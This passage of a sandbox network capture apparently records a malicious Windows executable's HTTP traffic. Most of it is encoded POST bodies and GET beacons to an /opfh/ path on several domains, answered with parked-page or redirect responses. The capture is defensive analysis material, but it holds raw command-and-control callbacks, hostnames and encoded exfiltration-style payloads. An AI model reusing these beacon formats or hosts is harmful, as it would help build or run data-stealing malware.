                            May 27, 2024 12:22:55.479232073 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzY5OWNhMmItOTA3Yy00NTU1LWE2ZmYtYjViN2I3ZDg0YzdkIiwicGFnZV90aW1lIjoxNzE2ODA1Mz


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            43192.168.2.763204199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:57.778562069 CEST1747OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.drapples.club
                            Origin: http://www.drapples.club
                            Referer: http://www.drapples.club/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 46 76 4b 32 4e 41 54 77 53 69 46 4e 56 64 35 73 57 48 36 4b 56 47 36 38 65 4f 54 6e 61 56 37 42 35 31 44 61 5a 38 2f 58 64 5a 68 67 4d 34 51 65 2f 35 78 6c 67 39 62 38 36 77 36 77 61 46 39 44 63 56 67 70 6e 35 38 4c 55 46 55 62 2f 43 36 66 47 57 79 69 31 66 33 42 68 4c 75 53 49 69 72 2f 6b 48 50 68 52 38 5a 42 46 50 6d 76 35 53 56 69 5a 58 2b 66 2f 56 64 58 41 6d 74 6d 56 7a 36 30 78 58 69 7a 71 45 67 59 76 37 56 57 6a 6f 66 54 6c 59 43 30 2f 64 73 31 66 6e 65 55 2b 59 51 79 63 76 59 71 6d 41 38 54 4a 41 51 4d 38 68 59 4a 49 67 7a 61 55 39 69 7a 52 51 4d 4f 6f 35 34 54 57 66 5a 56 47 54 2f 6f 69 54 65 37 59 6e 42 53 55 70 2b 67 4e 4f 4e 6b 38 55 72 57 4c 42 77 44 35 71 50 55 77 78 56 44 42 51 67 41 2f 63 45 6c 2f 6c 54 73 4b 41 56 76 2f 59 78 70 64 31 4b 49 6c 33 4a 58 70 4f 53 49 54 6b 73 5a 34 4e 68 53 4a 6b 35 65 4d 6a 30 39 49 7a 4a 38 77 7a 4d 43 64 69 74 79 65 62 36 74 47 51 72 6b 78 38 46 70 67 41 36 66 67 78 32 44 47 58 52 61 53 6a 5a 56 6f 63 6c 50 48 67 4b 53 6d 67 4f 6a [TRUNCATED]
                            Data Ascii: R40L6=FvK2NATwSiFNVd5sWH6KVG68eOTnaV7B51DaZ8/XdZhgM4Qe/5xlg9b86w6waF9DcVgpn58LUFUb/C6fGWyi1f3BhLuSIir/kHPhR8ZBFPmv5SViZX+f/VdXAmtmVz60xXizqEgYv7VWjofTlYC0/ds1fneU+YQycvYqmA8TJAQM8hYJIgzaU9izRQMOo54TWfZVGT/oiTe7YnBSUp+gNONk8UrWLBwD5qPUwxVDBQgA/cEl/lTsKAVv/Yxpd1KIl3JXpOSITksZ4NhSJk5eMj09IzJ8wzMCdityeb6tGQrkx8FpgA6fgx2DGXRaSjZVoclPHgKSmgOj7/SU9zsxpVxpduMytDxbDENgcRkYuQDu3knn+A/d1tY1z0+yTInTd0cW0hoS7qHTpWW7Ggmde/6HYDVsWAPaRNRq+Q7DTssCuY1slNvRf2Qa9hQZTEkokjB2H8zYABZiMOVuN9qNf45s7kernGA/lFogR8Be6uMmyhpkS1/BA+2e42+9NnlCkWsUtaNf79ceE68e2bVslaWy39mNx0IdNuuXGRyAY+5pwN+dqXPGlD+qEQ+6y1lZLRhuHD1MPl6sTiX/mCQ8EX2GFnQxu/AlMEJWkcSQHvB3DAmyGatHwfVhWhnV5Xwc5QevduZtFal/UmtGhntfRkx2Ss5d+nxmd53g/DK0l/Xe0GrgOcXFTIMXbG07hQPvX68oumSUA/X+4UIIQKeUJHgjmXmYy7Rl0iRBn7W0as9xLuYeNF0KPA8UEURL8gLC5GSdulnYuZigqmtPAF86RlygFlsZMph51FlI1iP3VfNn+BgkmxaccFUP2/svAes95H47FXxH0HF/DLtE6IPvbVpr30ptM+kBzJwzznrnESSL0jRWP8/uqU7I/tJ+M4zY5iSqiuMpp6rOfEYf7MWs8QUAQ0955XCRF65IeDpKjaEW2DDOnQrKxwcDXTDDJNLDtMwoSCxet5fJnZaxx1hh4yrSi8Wu4Fi9qsHihFLJBq9IE7 [TRUNCATED]
                            May 27, 2024 12:22:58.239726067 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:22:57 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: 6cd27e6f-5ecb-4a7e-b6ac-25ea90d14667
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==
                            set-cookie: parking_session=6cd27e6f-5ecb-4a7e-b6ac-25ea90d14667; expires=Mon, 27 May 2024 10:37:58 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 38 31 65 4a 46 62 6e 34 54 6c 6e 76 58 34 39 39 65 4a 6a 38 66 75 7a 70 6e 58 73 4a 36 64 67 6b 4f 56 42 2b 4f 50 69 4d 44 4e 31 76 35 6d 47 44 38 78 58 2f 5a 57 43 54 2b 71 44 4f 50 5a 36 33 35 50 44 31 38 66 42 77 6d 6f 4f 78 6c 2b 67 54 6a 74 71 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:22:58.239746094 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmNkMjdlNmYtNWVjYi00YTdlLWI2YWMtMjVlYTkwZDE0NjY3IiwicGFnZV90aW1lIjoxNzE2ODA1Mz


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            44192.168.2.763205199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:00.502659082 CEST457OUTGET /opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.drapples.club
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:23:00.995928049 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:23:00 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1518
                            x-request-id: 698d1947-8f52-4b93-bddb-02b4f84e0098
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mTCglIAGYg+5xF57z9+Jba+JXqVR0BIkX9FqTRK3vIWGbpAr46KQnPIzWkbCClWjJMhmnocAvYlRObAr/1GhSg==
                            set-cookie: parking_session=698d1947-8f52-4b93-bddb-02b4f84e0098; expires=Mon, 27 May 2024 10:38:00 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 54 43 67 6c 49 41 47 59 67 2b 35 78 46 35 37 7a 39 2b 4a 62 61 2b 4a 58 71 56 52 30 42 49 6b 58 39 46 71 54 52 4b 33 76 49 57 47 62 70 41 72 34 36 4b 51 6e 50 49 7a 57 6b 62 43 43 6c 57 6a 4a 4d 68 6d 6e 6f 63 41 76 59 6c 52 4f 62 41 72 2f 31 47 68 53 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mTCglIAGYg+5xF57z9+Jba+JXqVR0BIkX9FqTRK3vIWGbpAr46KQnPIzWkbCClWjJMhmnocAvYlRObAr/1GhSg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:23:00.995959044 CEST971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjk4ZDE5NDctOGY1Mi00YjkzLWJkZGItMDJiNGY4NGUwMDk4IiwicGFnZV90aW1lIjoxNzE2ODA1Mz


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            45192.168.2.7632063.33.130.190802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:06.049832106 CEST717OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.autonomyai.xyz
                            Origin: http://www.autonomyai.xyz
                            Referer: http://www.autonomyai.xyz/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 7a 6a 42 36 2b 7a 6a 70 6b 47 47 70 48 49 39 78 58 38 63 47 64 79 4c 53 65 55 33 44 70 38 6a 34 71 4b 71 61 4a 4d 72 6e 4d 4f 32 37 68 6a 36 47 66 6d 47 2b 42 6b 4c 54 41 34 50 46 46 54 4d 7a 30 56 48 6c 6c 44 52 51 32 33 43 73 6a 45 61 45 4f 41 6b 76 30 32 71 4a 51 62 46 73 70 76 41 69 35 4b 35 54 66 67 38 31 51 62 6f 71 53 32 59 42 65 55 58 62 77 38 77 74 51 65 52 53 55 42 45 55 4a 5a 30 72 75 71 74 50 4b 64 34 55 43 35 37 32 58 51 57 47 36 57 47 62 37 73 7a 33 57 34 6d 64 62 35 30 67 5a 41 64 5a 59 59 77 6a 4b 4e 4f 69 52 63 74 58 4f 38 4d 75 6f 72 4d 63 78 6d 63 2f 4a 47 53 77 44 69 54 34 46 37 33 52 39 38 69 74 70 67 3d 3d
                            Data Ascii: R40L6=zjB6+zjpkGGpHI9xX8cGdyLSeU3Dp8j4qKqaJMrnMO27hj6GfmG+BkLTA4PFFTMz0VHllDRQ23CsjEaEOAkv02qJQbFspvAi5K5Tfg81QboqS2YBeUXbw8wtQeRSUBEUJZ0ruqtPKd4UC572XQWG6WGb7sz3W4mdb50gZAdZYYwjKNOiRctXO8MuorMcxmc/JGSwDiT4F73R98itpg==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            46192.168.2.7632073.33.130.190802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:09.550307989 CEST737OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.autonomyai.xyz
                            Origin: http://www.autonomyai.xyz
                            Referer: http://www.autonomyai.xyz/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 7a 6a 42 36 2b 7a 6a 70 6b 47 47 70 46 70 4e 78 52 66 30 47 4b 43 4c 54 55 30 33 44 6e 63 6a 30 71 4b 32 61 4a 4e 2f 33 4e 38 53 37 67 44 4b 47 65 6c 65 2b 41 6b 4c 54 4c 59 50 45 50 7a 4d 6b 30 56 62 44 6c 42 46 51 32 33 57 73 6a 45 71 45 50 78 6b 77 30 6d 71 48 59 37 46 75 6b 50 41 69 35 4b 35 54 66 6b 55 62 51 62 67 71 53 46 77 42 63 78 72 63 75 73 77 73 54 65 52 53 5a 68 45 51 4a 5a 31 2b 75 76 30 48 4b 59 38 55 43 39 2f 32 58 44 4f 46 74 47 47 52 6b 63 79 45 52 34 33 6b 57 6f 4a 65 55 68 31 46 66 6f 51 77 50 37 54 41 4c 2b 68 37 51 74 30 56 73 70 6f 71 6d 41 42 4b 4c 48 57 6f 4f 41 6e 5a 61 4d 53 37 77 75 44 70 2f 55 79 57 79 5a 36 6b 4a 73 55 73 65 4e 4a 66 78 59 4d 64 37 5a 30 3d
                            Data Ascii: R40L6=zjB6+zjpkGGpFpNxRf0GKCLTU03Dncj0qK2aJN/3N8S7gDKGele+AkLTLYPEPzMk0VbDlBFQ23WsjEqEPxkw0mqHY7FukPAi5K5TfkUbQbgqSFwBcxrcuswsTeRSZhEQJZ1+uv0HKY8UC9/2XDOFtGGRkcyER43kWoJeUh1FfoQwP7TAL+h7Qt0VspoqmABKLHWoOAnZaMS7wuDp/UyWyZ6kJsUseNJfxYMd7Z0=


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            47192.168.2.7632083.33.130.190802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:12.082437038 CEST1750OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.autonomyai.xyz
                            Origin: http://www.autonomyai.xyz
                            Referer: http://www.autonomyai.xyz/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 7a 6a 42 36 2b 7a 6a 70 6b 47 47 70 46 70 4e 78 52 66 30 47 4b 43 4c 54 55 30 33 44 6e 63 6a 30 71 4b 32 61 4a 4e 2f 33 4e 38 61 37 67 79 71 47 66 46 69 2b 44 6b 4c 54 49 59 50 4a 50 7a 4d 63 30 56 44 50 6c 42 35 6d 32 31 75 73 78 31 4b 45 49 46 77 77 36 6d 71 48 55 62 46 76 70 76 41 33 35 4b 4a 66 66 67 77 62 51 62 67 71 53 44 4d 42 59 6b 58 63 73 73 77 74 51 65 52 67 55 42 45 38 4a 5a 4d 4a 75 72 70 6c 4e 73 49 55 43 64 76 32 61 52 57 46 79 32 47 58 6e 63 79 63 52 34 37 46 57 6f 45 76 55 68 42 2f 66 72 41 77 4e 73 2f 61 51 2f 78 44 53 62 59 66 74 62 73 66 68 69 4a 6a 4b 6c 50 51 47 51 69 39 65 75 2b 64 31 2b 71 6f 71 45 6e 4e 69 59 69 58 52 74 67 44 58 36 6b 41 72 61 41 69 34 63 62 7a 76 57 43 43 6e 50 7a 7a 56 69 32 4c 72 6a 64 53 49 4e 6b 34 58 6e 50 4a 35 32 63 32 62 47 69 2f 45 73 4d 53 61 49 34 75 7a 51 4b 51 79 6d 6a 49 51 6b 6e 67 74 33 2f 75 31 33 34 76 6b 53 37 49 62 4c 30 47 45 55 70 78 51 38 61 2f 47 68 66 36 4b 38 35 38 6a 32 76 47 6c 72 71 6e 65 43 4b 4a 34 42 53 58 [TRUNCATED]
                            Data Ascii: R40L6=zjB6+zjpkGGpFpNxRf0GKCLTU03Dncj0qK2aJN/3N8a7gyqGfFi+DkLTIYPJPzMc0VDPlB5m21usx1KEIFww6mqHUbFvpvA35KJffgwbQbgqSDMBYkXcsswtQeRgUBE8JZMJurplNsIUCdv2aRWFy2GXncycR47FWoEvUhB/frAwNs/aQ/xDSbYftbsfhiJjKlPQGQi9eu+d1+qoqEnNiYiXRtgDX6kAraAi4cbzvWCCnPzzVi2LrjdSINk4XnPJ52c2bGi/EsMSaI4uzQKQymjIQkngt3/u134vkS7IbL0GEUpxQ8a/Ghf6K858j2vGlrqneCKJ4BSXlCb2oBjBQz8ONMlYhqjZGnofEoYITlK6d2oSLL0it0nTscj35Zj0Ng0p033tJR0558VUHHMbDhQKWli3HqTGf+e1buoYbaEtq+W16dccRPymjp/l1WiTRHcSLPSGSF5ImAo8+1b/LGJhbGHgpmXjnIsAg5TT+fPPfEOyH0QGrzTSKHP7ErtiJlwi1LntJU/vthbErzZdkgQauIUClR/KDIDWVhPRA1ZfIjLvq+rHr+a/xX+A30rUAD68eGCYnXo7tvP4fHjyja5neEbtVUfWd+m6YSr/M/JtKSEI49DB/udaRPBJpwJvNKnNwTfTr82YvErmyAfs5DDPeq26hjr+FfcZcnKiQvptZ88nebJwF//xjkkHImUYDI1To9CcXaGgWLEotUMJt1uqetT0Zp2Z5c25qesthwGTCfvkrbouStdafFPlffxwvRxgByeBreZDWIUbW1lOWSYRDmchKAlWnKe4JvcVNdIGFADcwaMbA5u+wZNwl2zkDxdN1XH93Uk6thhcaJxN8qZWdT9mhwoJp53Ijclc4OX2WG361NhcXl8bsBG5yTVhzTsP0nyFQxSO+8DUDmpLlF69LaFaVol9NYwAafjd2zPIBtEd3eSkc+84EcdHsgR5J5zzWRQNbj1A2KPxNGZVk8a9h/DeL/E3BqhZ0U2TtcGK4T [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            48192.168.2.7632093.33.130.190802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:14.615155935 CEST458OUTGET /opfh/?R40L6=+hpa9HKLtxeYEKNNXPI5VBSfdFDUoaiCusvmIOnHC/L+zjqEV17vBkaVEMb7DgIovUP6hhFd7FyMm1q4LBIs3FeHHcdJlscr/I16R146dIQqVis5Y3/utpIuSORveCYceuc/vKNgK8Bg&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.autonomyai.xyz
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:23:15.085428953 CEST419INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Mon, 27 May 2024 10:23:15 GMT
                            Content-Type: text/html
                            Content-Length: 279
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 34 30 4c 36 3d 2b 68 70 61 39 48 4b 4c 74 78 65 59 45 4b 4e 4e 58 50 49 35 56 42 53 66 64 46 44 55 6f 61 69 43 75 73 76 6d 49 4f 6e 48 43 2f 4c 2b 7a 6a 71 45 56 31 37 76 42 6b 61 56 45 4d 62 37 44 67 49 6f 76 55 50 36 68 68 46 64 37 46 79 4d 6d 31 71 34 4c 42 49 73 33 46 65 48 48 63 64 4a 6c 73 63 72 2f 49 31 36 52 31 34 36 64 49 51 71 56 69 73 35 59 33 2f 75 74 70 49 75 53 4f 52 76 65 43 59 63 65 75 63 2f 76 4b 4e 67 4b 38 42 67 26 62 32 50 58 3d 68 5a 58 6c 37 56 46 50 4b 6c 30 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R40L6=+hpa9HKLtxeYEKNNXPI5VBSfdFDUoaiCusvmIOnHC/L+zjqEV17vBkaVEMb7DgIovUP6hhFd7FyMm1q4LBIs3FeHHcdJlscr/I16R146dIQqVis5Y3/utpIuSORveCYceuc/vKNgK8Bg&b2PX=hZXl7VFPKl04"}</script></head></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            49192.168.2.76321091.195.240.92802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:20.177505016 CEST735OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.pharmacielorraine.fr
                            Origin: http://www.pharmacielorraine.fr
                            Referer: http://www.pharmacielorraine.fr/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 49 72 6c 4f 66 5a 57 69 69 43 65 2b 52 73 53 6c 51 4f 6c 56 58 72 48 2f 78 65 57 64 52 37 44 71 59 70 49 4e 51 78 62 47 45 33 6b 39 79 4d 35 2b 78 66 6d 72 33 66 6d 7a 30 79 4a 4c 38 39 49 42 73 69 46 37 4e 74 35 74 43 62 44 36 35 78 30 45 77 66 41 71 74 32 6c 4c 51 6d 4d 42 2b 4d 71 4d 50 6e 67 53 43 4d 56 4e 65 4a 6d 70 4f 70 39 7a 58 6f 35 71 79 34 67 38 39 78 69 4b 6f 35 54 69 78 6a 48 71 6a 69 48 4e 52 46 4c 48 32 62 55 62 47 47 44 79 42 4f 33 54 79 69 42 65 6d 70 32 52 79 6a 6b 61 58 55 42 6e 75 33 46 46 44 30 4a 52 49 6e 7a 32 4e 79 42 54 6a 52 53 72 36 4f 68 58 76 39 67 58 55 4b 30 2f 5a 4d 61 59 45 53 5a 6a 33 77 3d 3d
                            Data Ascii: R40L6=IrlOfZWiiCe+RsSlQOlVXrH/xeWdR7DqYpINQxbGE3k9yM5+xfmr3fmz0yJL89IBsiF7Nt5tCbD65x0EwfAqt2lLQmMB+MqMPngSCMVNeJmpOp9zXo5qy4g89xiKo5TixjHqjiHNRFLH2bUbGGDyBO3TyiBemp2RyjkaXUBnu3FFD0JRInz2NyBTjRSr6OhXv9gXUK0/ZMaYESZj3w==
                            May 27, 2024 12:23:20.821274996 CEST299INHTTP/1.1 405 Not Allowed
                            date: Mon, 27 May 2024 10:23:20 GMT
                            content-type: text/html
                            content-length: 154
                            server: NginX
                            connection: close
